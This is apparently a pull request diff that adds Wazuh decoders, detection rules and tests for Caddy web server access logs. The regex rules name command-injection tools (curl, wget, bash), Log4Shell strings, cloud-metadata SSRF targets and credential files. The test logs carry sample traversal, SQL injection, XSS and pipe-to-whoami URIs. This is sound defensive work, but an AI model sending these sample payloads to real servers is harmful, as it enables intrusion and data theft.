### PR TITLE
feat(ruleset): Add Caddy web server decoder and detection rules

### DIFF
--- a/ruleset/decoders/0590-caddy_decoders.xml
+++ b/ruleset/decoders/0590-caddy_decoders.xml
@@ -1,7 +1,8 @@
 <!--
-  Caddy Web Server Decoders
-  Caddy outputs structured JSON access logs.
-  Log format: https://caddyserver.com/docs/logging
+  -  Caddy web server decoders
+  -  Created by NucleiAv
+  -  Copyright (C) 2015, Wazuh Inc.
+  -  This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
 -->
 
 <decoder name="caddy">

--- a/ruleset/decoders/0590-caddy_decoders.xml
+++ b/ruleset/decoders/0590-caddy_decoders.xml
@@ -1,0 +1,14 @@
+<!--
+  Caddy Web Server Decoders
+  Caddy outputs structured JSON access logs.
+  Log format: https://caddyserver.com/docs/logging
+-->
+
+<decoder name="caddy">
+  <prematch>"logger":"http\.log\.access</prematch>
+</decoder>
+
+<decoder name="caddy-access">
+  <parent>caddy</parent>
+  <plugin_decoder>JSON_Decoder</plugin_decoder>
+</decoder>

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -6,7 +6,7 @@
 -->
 
 <!--
-  -  ID range: 996000 - 996030
+  -  ID range: 996000 - 996032
 -->
 
 <group name="caddy,web,">
@@ -250,6 +250,26 @@
     <group>web,recon,scan,</group>
     <mitre>
       <id>T1595.002</id>
+    </mitre>
+  </rule>
+
+  <rule id="996031" level="13">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/upload|\/uploads|\/files|\/media|\/assets|\/static)[^?]*\.(php[0-9]?|phtml|phar|asp|aspx|jsp|jspx|cfm|cgi|pl|py|rb|sh|exe|dll|bat|cmd|vbs|ps1)\.[a-z]{2,4}(\?|$)</field>
+    <description>Caddy: Double extension bypass upload attempt from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,attack,upload,evasion,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <rule id="996032" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/upload|\/uploads|\/files|\/media|\/assets|\/static)[^?]*\.(zip|rar|7z|tar|gz|tgz|iso|img|docm|xlsm|pptm|xlam|svg)(\?|$)</field>
+    <description>Caddy: Archive or macro-enabled file upload from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,upload,</group>
+    <mitre>
+      <id>T1566.001</id>
     </mitre>
   </rule>
 

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -185,7 +185,7 @@
 
   <rule id="996024" level="12">
     <if_sid>996000</if_sid>
-    <field name="request.uri" type="pcre2">(?i)(php://|phar://|data://|expect://|zip://|glob://|file://|gopher://|dict://|\.(php|phtml|phar)\b.*=|[?&amp;][^&amp;]+=https?://|[?&amp;][^&amp;]+=ftp://)</field>
+    <field name="request.uri" type="pcre2">(?i)(php://|phar://|data://|expect://|zip://|glob://|file://|gopher://|dict://|\.(php|phtml|phar)\b.*=)</field>
     <description>Caddy: LFI/RFI file inclusion attempt from $(request.remote_ip) - $(request.uri)</description>
     <group>web,attack,lfi,</group>
     <mitre>

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -171,6 +171,25 @@
     </mitre>
   </rule>
 
+  <!-- Authentication endpoint access (base for brute force detection) -->
+  <rule id="996021" level="3">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)\/(login|signin|sign-in|logon|auth|authenticate|wp-login\.php|admin\/login|account\/login|session\/new|user\/login|api\/login|api\/auth|oauth\/token|token)(\/|\?|$)</field>
+    <description>Caddy: Authentication endpoint access from $(request.remote_ip)</description>
+    <group>web,authentication,</group>
+  </rule>
+
+  <!-- Brute force: same IP hitting auth endpoints 10+ times in 60 seconds -->
+  <rule id="996022" level="10" frequency="10" timeframe="60">
+    <if_matched_sid>996021</if_matched_sid>
+    <same_field>request.remote_ip</same_field>
+    <description>Caddy: Possible brute force - repeated auth endpoint hits from $(request.remote_ip)</description>
+    <group>web,attack,brute_force,</group>
+    <mitre>
+      <id>T1110</id>
+    </mitre>
+  </rule>
+
   <!-- Directory enumeration: same IP probing 10+ sensitive paths in 60 seconds -->
   <rule id="996018" level="14" frequency="10" timeframe="60">
     <if_matched_sid>996005</if_matched_sid>

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -1,6 +1,11 @@
 <!--
   Caddy Web Server Rules
   Depends on: caddy_decoders.xml
+
+  NOTE: Wazuh's built-in json decoder fires before user decoders, so the base
+  rule matches on <field name="logger"> rather than <decoded_as>caddy-access</decoded_as>.
+  The "status" field is a Wazuh reserved field and cannot be used in <field> tags,
+  so 4xx/5xx status-based rules are not implementable via this mechanism.
 -->
 
 <group name="caddy,web,">
@@ -11,10 +16,10 @@
     <description>Caddy web server access log.</description>
   </rule>
 
-  <!-- Path traversal attempt -->
+  <!-- Path traversal attempt: PCRE2 required so \. is a literal dot, not any-char -->
   <rule id="996003" level="10">
     <if_sid>996000</if_sid>
-    <field name="request.uri">\.\./|\.\.\\|%2e%2e|%252e%252e</field>
+    <field name="request.uri" type="pcre2">(?i)(\.\./|\.\.\\|%2e%2e|%252e%252e)</field>
     <description>Caddy: Path traversal attempt from $(request.remote_ip)</description>
     <group>web,attack,path_traversal,</group>
     <mitre>
@@ -22,10 +27,11 @@
     </mitre>
   </rule>
 
-  <!-- SQL injection pattern in URI -->
+  <!-- SQL injection: keyword-based (UNION/SELECT) and boolean (OR 1=1, ' OR ') patterns.
+       %27 = URL-encoded ', %20 = URL-encoded space, %3D = URL-encoded =  -->
   <rule id="996004" level="10">
     <if_sid>996000</if_sid>
-    <field name="request.uri" type="pcre2">(?i)(union.+select|select.+from|insert.+into|drop.+table)</field>
+    <field name="request.uri" type="pcre2">(?i)(union.+select|select.+from|insert.+into|drop.+table|(%27|')(\s|%20)*(or)(\s|%20)+|(\s|%20)(or)(\s|%20)+1(\s|%20)*(%3D|=)(\s|%20)*1)</field>
     <description>Caddy: SQL injection attempt from $(request.remote_ip)</description>
     <group>web,attack,sql_injection,</group>
     <mitre>
@@ -33,14 +39,157 @@
     </mitre>
   </rule>
 
-  <!-- Sensitive path probing -->
+  <!-- Sensitive path probing (wp-admin, phpmyadmin, etc.) -->
   <rule id="996005" level="8">
     <if_sid>996000</if_sid>
-    <field name="request.uri">\.env$|\.git|wp-admin|phpmyadmin|admin\.php</field>
+    <field name="request.uri" type="pcre2">(?i)(\/\.env$|\/\.git|\/wp-admin|\/phpmyadmin|\/admin\.php|\/config\.php|\/backup)</field>
     <description>Caddy: Sensitive path probe from $(request.remote_ip) - $(request.uri)</description>
     <group>web,recon,</group>
     <mitre>
       <id>T1595</id>
+    </mitre>
+  </rule>
+
+  <!-- XSS attempt in URI -->
+  <rule id="996008" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(%3Cscript|&lt;script|javascript:|onerror=|onload=|alert\(|document\.cookie|eval\()</field>
+    <description>Caddy: XSS attempt in URI from $(request.remote_ip)</description>
+    <group>web,attack,xss,</group>
+    <mitre>
+      <id>T1059.007</id>
+    </mitre>
+  </rule>
+
+  <!-- Command injection attempt in URI -->
+  <rule id="996009" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(%7C|%60|\||\`).*?(ls|id|whoami|cat\s|wget\s|curl\s|bash|/bin/sh|cmd\.exe)</field>
+    <description>Caddy: Command injection attempt from $(request.remote_ip)</description>
+    <group>web,attack,command_injection,</group>
+    <mitre>
+      <id>T1059</id>
+    </mitre>
+  </rule>
+
+  <!-- Known attack/scanner tool user agents -->
+  <rule id="996010" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.headers.User-Agent" type="pcre2">(?i)(sqlmap|nikto|nmap|masscan|nuclei|gobuster|dirbuster|wfuzz|acunetix|nessus|openvas|zgrab|whatweb)</field>
+    <description>Caddy: Known attack or scanner tool detected from $(request.remote_ip)</description>
+    <group>web,recon,scan,</group>
+    <mitre>
+      <id>T1595</id>
+    </mitre>
+  </rule>
+
+  <!-- HTTP TRACE/TRACK method - cross-site tracing attack vector -->
+  <rule id="996011" level="6">
+    <if_sid>996000</if_sid>
+    <field name="request.method">TRACE|TRACK</field>
+    <description>Caddy: HTTP TRACE/TRACK method from $(request.remote_ip) - possible cross-site tracing</description>
+    <group>web,attack,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <!-- Log4Shell JNDI injection attempt -->
+  <rule id="996012" level="15">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\$\{jndi:|%24%7Bjndi%3A|%24%7Bjndi:)</field>
+    <description>Caddy: Log4Shell JNDI injection attempt from $(request.remote_ip)</description>
+    <group>web,attack,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <!-- Sensitive file access attempts (web app configs, system files) -->
+  <rule id="996013" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/xmlrpc\.php|\/\.htaccess|\/\.htpasswd|\/wp-config\.php|\/config\.php|\/backup|\/dump\.sql|\/proc\/self|\/etc\/shadow)</field>
+    <description>Caddy: Sensitive file access attempt from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1083</id>
+    </mitre>
+  </rule>
+
+  <!-- Credential and secret file access (env files, private keys, token stores) -->
+  <rule id="996014" level="12">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/\.env(\.|$|\/)|\/id_rsa|\/id_dsa|\/id_ed25519|\/id_ecdsa|credentials?\.json|credentials?\.xml|secrets?\.json|secrets?\.ya?ml|jwt\.(pem|secret)|private\.key|oauth\.json|token\.json|authorized_keys|known_hosts|\.p12$|\.pfx$|\.pem$|\.key$)</field>
+    <description>Caddy: Credential or private key file access from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,attack,credential_access,</group>
+    <mitre>
+      <id>T1552.001</id>
+    </mitre>
+  </rule>
+
+  <!-- Backup and database dump file access -->
+  <rule id="996015" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)\.(bak|backup|old|orig|save|swp|sql|dump|sqlite|db|mdb|tar\.gz|tar\.bz2|tgz|7z|rar)(\?|$)</field>
+    <description>Caddy: Backup or database dump file access from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1530</id>
+    </mitre>
+  </rule>
+
+  <!-- Source control repository artifact exposure -->
+  <rule id="996016" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/\.git(\/|$)|\/\.svn\/|\/\.hg\/|\/\.gitignore|\/\.gitattributes|\/\.gitmodules)</field>
+    <description>Caddy: Source control artifact access from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1213</id>
+    </mitre>
+  </rule>
+
+  <!-- Application log file exposure -->
+  <rule id="996017" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)\/(error|access|debug|app|application|server|system|audit|exception)\.(log|txt|out)(\?|$)</field>
+    <description>Caddy: Application log file access from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1083</id>
+    </mitre>
+  </rule>
+
+  <!-- Suspicious keyword in requested filename (passwords, secrets, confidential, etc.) -->
+  <rule id="996020" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)\/(password|passwd|secret|confidential|credential|private|token|apikey|api[_-]key|auth)[^/]*(\.[a-z]{1,5})?$</field>
+    <description>Caddy: Request for suspicious filename from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1083</id>
+    </mitre>
+  </rule>
+
+  <!-- Directory enumeration: same IP probing 10+ sensitive paths in 60 seconds -->
+  <rule id="996018" level="14" frequency="10" timeframe="60">
+    <if_matched_sid>996005</if_matched_sid>
+    <same_field>request.remote_ip</same_field>
+    <description>Caddy: Directory enumeration detected - repeated sensitive path probes from $(request.remote_ip)</description>
+    <group>web,attack,scan,</group>
+    <mitre>
+      <id>T1595.001</id>
+    </mitre>
+  </rule>
+
+  <!-- Brute force / aggressive scanning: same IP triggering 8+ attack rules in 60 seconds -->
+  <rule id="996019" level="14" frequency="8" timeframe="60">
+    <if_matched_sid>996003</if_matched_sid>
+    <same_field>request.remote_ip</same_field>
+    <description>Caddy: Aggressive scanning or brute force - repeated path traversal attempts from $(request.remote_ip)</description>
+    <group>web,attack,brute_force,</group>
+    <mitre>
+      <id>T1110</id>
     </mitre>
   </rule>
 

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -245,7 +245,7 @@
 
   <rule id="996030" level="8">
     <if_sid>996000</if_sid>
-    <field name="request.uri" type="pcre2">^.{2000,}</field>
+    <field name="request.uri" type="pcre2">^.{1000,}</field>
     <description>Caddy: Oversized URI detected from $(request.remote_ip) - possible fuzzing</description>
     <group>web,recon,scan,</group>
     <mitre>

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -1,22 +1,21 @@
 <!--
-  Caddy Web Server Rules
-  Depends on: caddy_decoders.xml
+  -  Caddy web server rules
+  -  Created by NucleiAv
+  -  Copyright (C) 2015, Wazuh Inc.
+  -  This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
+-->
 
-  NOTE: Wazuh's built-in json decoder fires before user decoders, so the base
-  rule matches on <field name="logger"> rather than <decoded_as>caddy-access</decoded_as>.
-  The "status" field is a Wazuh reserved field and cannot be used in <field> tags,
-  so 4xx/5xx status-based rules are not implementable via this mechanism.
+<!--
+  -  ID range: 996000 - 996030
 -->
 
 <group name="caddy,web,">
 
-  <!-- Base rule: identify Caddy logs by the logger field -->
   <rule id="996000" level="0">
     <field name="logger">http\.log\.access</field>
     <description>Caddy web server access log.</description>
   </rule>
 
-  <!-- Path traversal attempt: PCRE2 required so \. is a literal dot, not any-char -->
   <rule id="996003" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\.\./|\.\.\\|%2e%2e|%252e%252e)</field>
@@ -27,8 +26,6 @@
     </mitre>
   </rule>
 
-  <!-- SQL injection: keyword-based (UNION/SELECT) and boolean (OR 1=1, ' OR ') patterns.
-       %27 = URL-encoded ', %20 = URL-encoded space, %3D = URL-encoded =  -->
   <rule id="996004" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(union.+select|select.+from|insert.+into|drop.+table|(%27|')(\s|%20)*(or)(\s|%20)+|(\s|%20)(or)(\s|%20)+1(\s|%20)*(%3D|=)(\s|%20)*1)</field>
@@ -39,7 +36,6 @@
     </mitre>
   </rule>
 
-  <!-- Sensitive path probing (wp-admin, phpmyadmin, etc.) -->
   <rule id="996005" level="8">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\/\.env$|\/\.git|\/wp-admin|\/phpmyadmin|\/admin\.php|\/config\.php|\/backup)</field>
@@ -50,7 +46,6 @@
     </mitre>
   </rule>
 
-  <!-- XSS attempt in URI -->
   <rule id="996008" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(%3Cscript|&lt;script|javascript:|onerror=|onload=|alert\(|document\.cookie|eval\()</field>
@@ -61,7 +56,6 @@
     </mitre>
   </rule>
 
-  <!-- Command injection attempt in URI -->
   <rule id="996009" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(%7C|%60|\||\`).*?(ls|id|whoami|cat\s|wget\s|curl\s|bash|/bin/sh|cmd\.exe)</field>
@@ -72,7 +66,6 @@
     </mitre>
   </rule>
 
-  <!-- Known attack/scanner tool user agents -->
   <rule id="996010" level="8">
     <if_sid>996000</if_sid>
     <field name="request.headers.User-Agent" type="pcre2">(?i)(sqlmap|nikto|nmap|masscan|nuclei|gobuster|dirbuster|wfuzz|acunetix|nessus|openvas|zgrab|whatweb)</field>
@@ -83,7 +76,6 @@
     </mitre>
   </rule>
 
-  <!-- HTTP TRACE/TRACK method - cross-site tracing attack vector -->
   <rule id="996011" level="6">
     <if_sid>996000</if_sid>
     <field name="request.method">TRACE|TRACK</field>
@@ -94,7 +86,6 @@
     </mitre>
   </rule>
 
-  <!-- Log4Shell JNDI injection attempt -->
   <rule id="996012" level="15">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\$\{jndi:|%24%7Bjndi%3A|%24%7Bjndi:)</field>
@@ -105,7 +96,6 @@
     </mitre>
   </rule>
 
-  <!-- Sensitive file access attempts (web app configs, system files) -->
   <rule id="996013" level="8">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\/xmlrpc\.php|\/\.htaccess|\/\.htpasswd|\/wp-config\.php|\/config\.php|\/backup|\/dump\.sql|\/proc\/self|\/etc\/shadow)</field>
@@ -116,7 +106,6 @@
     </mitre>
   </rule>
 
-  <!-- Credential and secret file access (env files, private keys, token stores) -->
   <rule id="996014" level="12">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\/\.env(\.|$|\/)|\/id_rsa|\/id_dsa|\/id_ed25519|\/id_ecdsa|credentials?\.json|credentials?\.xml|secrets?\.json|secrets?\.ya?ml|jwt\.(pem|secret)|private\.key|oauth\.json|token\.json|authorized_keys|known_hosts|\.p12$|\.pfx$|\.pem$|\.key$)</field>
@@ -127,7 +116,6 @@
     </mitre>
   </rule>
 
-  <!-- Backup and database dump file access -->
   <rule id="996015" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)\.(bak|backup|old|orig|save|swp|sql|dump|sqlite|db|mdb|tar\.gz|tar\.bz2|tgz|7z|rar)(\?|$)</field>
@@ -138,7 +126,6 @@
     </mitre>
   </rule>
 
-  <!-- Source control repository artifact exposure -->
   <rule id="996016" level="10">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)(\/\.git(\/|$)|\/\.svn\/|\/\.hg\/|\/\.gitignore|\/\.gitattributes|\/\.gitmodules)</field>
@@ -149,7 +136,6 @@
     </mitre>
   </rule>
 
-  <!-- Application log file exposure -->
   <rule id="996017" level="8">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)\/(error|access|debug|app|application|server|system|audit|exception)\.(log|txt|out)(\?|$)</field>
@@ -160,7 +146,6 @@
     </mitre>
   </rule>
 
-  <!-- Suspicious keyword in requested filename (passwords, secrets, confidential, etc.) -->
   <rule id="996020" level="8">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)\/(password|passwd|secret|confidential|credential|private|token|apikey|api[_-]key|auth)[^/]*(\.[a-z]{1,5})?$</field>
@@ -171,7 +156,6 @@
     </mitre>
   </rule>
 
-  <!-- Authentication endpoint access (base for brute force detection) -->
   <rule id="996021" level="3">
     <if_sid>996000</if_sid>
     <field name="request.uri" type="pcre2">(?i)\/(login|signin|sign-in|logon|auth|authenticate|wp-login\.php|admin\/login|account\/login|session\/new|user\/login|api\/login|api\/auth|oauth\/token|token)(\/|\?|$)</field>
@@ -179,7 +163,6 @@
     <group>web,authentication,</group>
   </rule>
 
-  <!-- Brute force: same IP hitting auth endpoints 10+ times in 60 seconds -->
   <rule id="996022" level="10" frequency="10" timeframe="60">
     <if_matched_sid>996021</if_matched_sid>
     <same_field>request.remote_ip</same_field>
@@ -190,7 +173,86 @@
     </mitre>
   </rule>
 
-  <!-- Directory enumeration: same IP probing 10+ sensitive paths in 60 seconds -->
+  <rule id="996023" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(%c0%ae|%c0%2f|%c1%9c|%uff0e|%u2215|%u002f|%252f|%255c|\.\.%ef%bc%8f|\.\.%c0%af)</field>
+    <description>Caddy: Encoding evasion / WAF bypass attempt from $(request.remote_ip)</description>
+    <group>web,attack,evasion,</group>
+    <mitre>
+      <id>T1027</id>
+    </mitre>
+  </rule>
+
+  <rule id="996024" level="12">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(php://|phar://|data://|expect://|zip://|glob://|file://|gopher://|dict://|\.(php|phtml|phar)\b.*=|[?&amp;][^&amp;]+=https?://|[?&amp;][^&amp;]+=ftp://)</field>
+    <description>Caddy: LFI/RFI file inclusion attempt from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,attack,lfi,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <rule id="996025" level="12">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(169\.254\.169\.254|metadata\.google\.internal|metadata/instance|169\.254\.170\.2|100\.100\.100\.200|[?&amp;][^&amp;]*=https?://(127\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|localhost)|[?&amp;][^&amp;]*=https?://[^/]*\.(internal|local|corp|intranet))</field>
+    <description>Caddy: SSRF attempt targeting internal resource from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,attack,ssrf,</group>
+    <mitre>
+      <id>T1090</id>
+    </mitre>
+  </rule>
+
+  <rule id="996026" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/graphql|\/graphiql|\/gql|__schema|__type|__typename|introspectionquery)</field>
+    <description>Caddy: GraphQL introspection or API schema probe from $(request.remote_ip)</description>
+    <group>web,recon,api,</group>
+    <mitre>
+      <id>T1595.002</id>
+    </mitre>
+  </rule>
+
+  <rule id="996027" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.method" type="pcre2">^(CONNECT|DEBUG|MOVE|COPY|PROPFIND|PROPPATCH|MKCOL|LOCK|UNLOCK|BREW|TEST|FUZZ|SEARCH|PURGE)$</field>
+    <description>Caddy: Unusual or dangerous HTTP method from $(request.remote_ip) - $(request.method)</description>
+    <group>web,attack,protocol_abuse,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <rule id="996028" level="6">
+    <if_sid>996000</if_sid>
+    <field name="request.headers.User-Agent" type="pcre2">^(\[\]|''|-)$|^.{500,}</field>
+    <description>Caddy: Suspicious User-Agent (empty or oversized) from $(request.remote_ip)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1036</id>
+    </mitre>
+  </rule>
+
+  <rule id="996029" level="12">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(\/upload|\/uploads|\/files|\/media|\/assets|\/static)[^?]*\.(php[0-9]?|phtml|phar|asp|aspx|jsp|jspx|cfm|cgi|pl|py|rb|sh|exe|dll|bat|cmd|vbs|ps1)</field>
+    <description>Caddy: Dangerous file upload attempt from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,attack,upload,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <rule id="996030" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">^.{2000,}</field>
+    <description>Caddy: Oversized URI detected from $(request.remote_ip) - possible fuzzing</description>
+    <group>web,recon,scan,</group>
+    <mitre>
+      <id>T1595.002</id>
+    </mitre>
+  </rule>
+
   <rule id="996018" level="14" frequency="10" timeframe="60">
     <if_matched_sid>996005</if_matched_sid>
     <same_field>request.remote_ip</same_field>
@@ -201,11 +263,10 @@
     </mitre>
   </rule>
 
-  <!-- Brute force / aggressive scanning: same IP triggering 8+ attack rules in 60 seconds -->
   <rule id="996019" level="14" frequency="8" timeframe="60">
     <if_matched_sid>996003</if_matched_sid>
     <same_field>request.remote_ip</same_field>
-    <description>Caddy: Aggressive scanning or brute force - repeated path traversal attempts from $(request.remote_ip)</description>
+    <description>Caddy: Aggressive scanning - repeated path traversal attempts from $(request.remote_ip)</description>
     <group>web,attack,brute_force,</group>
     <mitre>
       <id>T1110</id>

--- a/ruleset/rules/0965-caddy_rules.xml
+++ b/ruleset/rules/0965-caddy_rules.xml
@@ -1,0 +1,47 @@
+<!--
+  Caddy Web Server Rules
+  Depends on: caddy_decoders.xml
+-->
+
+<group name="caddy,web,">
+
+  <!-- Base rule: identify Caddy logs by the logger field -->
+  <rule id="996000" level="0">
+    <field name="logger">http\.log\.access</field>
+    <description>Caddy web server access log.</description>
+  </rule>
+
+  <!-- Path traversal attempt -->
+  <rule id="996003" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri">\.\./|\.\.\\|%2e%2e|%252e%252e</field>
+    <description>Caddy: Path traversal attempt from $(request.remote_ip)</description>
+    <group>web,attack,path_traversal,</group>
+    <mitre>
+      <id>T1083</id>
+    </mitre>
+  </rule>
+
+  <!-- SQL injection pattern in URI -->
+  <rule id="996004" level="10">
+    <if_sid>996000</if_sid>
+    <field name="request.uri" type="pcre2">(?i)(union.+select|select.+from|insert.+into|drop.+table)</field>
+    <description>Caddy: SQL injection attempt from $(request.remote_ip)</description>
+    <group>web,attack,sql_injection,</group>
+    <mitre>
+      <id>T1190</id>
+    </mitre>
+  </rule>
+
+  <!-- Sensitive path probing -->
+  <rule id="996005" level="8">
+    <if_sid>996000</if_sid>
+    <field name="request.uri">\.env$|\.git|wp-admin|phpmyadmin|admin\.php</field>
+    <description>Caddy: Sensitive path probe from $(request.remote_ip) - $(request.uri)</description>
+    <group>web,recon,</group>
+    <mitre>
+      <id>T1595</id>
+    </mitre>
+  </rule>
+
+</group>

--- a/ruleset/testing/tests/caddy.ini
+++ b/ruleset/testing/tests/caddy.ini
@@ -1,0 +1,184 @@
+;  Copyright (C) 2015, Wazuh Inc.
+;
+;  Tests for products:
+;    Caddy web server
+;
+;  Sample logs source:
+;    Caddy HTTP server JSON access log (http.log.access)
+
+[Caddy: Base access log.]
+log 1 pass = {"level":"info","ts":1781976027.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.1","remote_port":"12345","client_ip":"10.0.0.1","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":200,"status":200,"resp_headers":{"Server":["Caddy"],"Content-Type":["text/html"]}}
+rule = 996000
+alert = 0
+decoder = json
+
+[Caddy: Path traversal attempt.]
+log 1 pass = {"level":"info","ts":1781976028.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.2","remote_port":"12346","client_ip":"10.0.0.2","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/../etc/passwd","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":400,"resp_headers":{"Server":["Caddy"]}}
+rule = 996003
+alert = 10
+decoder = json
+
+[Caddy: SQL injection attempt.]
+log 1 pass = {"level":"info","ts":1781976029.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.3","remote_port":"12347","client_ip":"10.0.0.3","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/search?q=1 UNION SELECT username,password FROM users","headers":{"User-Agent":["sqlmap/1.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996004
+alert = 10
+decoder = json
+
+[Caddy: Sensitive path probe.]
+log 1 pass = {"level":"info","ts":1781976030.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.4","remote_port":"12348","client_ip":"10.0.0.4","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/wp-admin","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":404,"resp_headers":{"Server":["Caddy"]}}
+rule = 996005
+alert = 8
+decoder = json
+
+[Caddy: XSS attempt in URI.]
+log 1 pass = {"level":"info","ts":1781976031.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.5","remote_port":"12349","client_ip":"10.0.0.5","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/search?q=%3Cscript%3Ealert(1)%3C/script%3E","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996008
+alert = 10
+decoder = json
+
+[Caddy: Command injection attempt.]
+log 1 pass = {"level":"info","ts":1781976032.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.6","remote_port":"12350","client_ip":"10.0.0.6","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/page?input=test%7Cwhoami","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996009
+alert = 10
+decoder = json
+
+[Caddy: Known scanner tool detected.]
+log 1 pass = {"level":"info","ts":1781976033.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.7","remote_port":"12351","client_ip":"10.0.0.7","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/","headers":{"User-Agent":["nikto/2.1.6"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996010
+alert = 8
+decoder = json
+
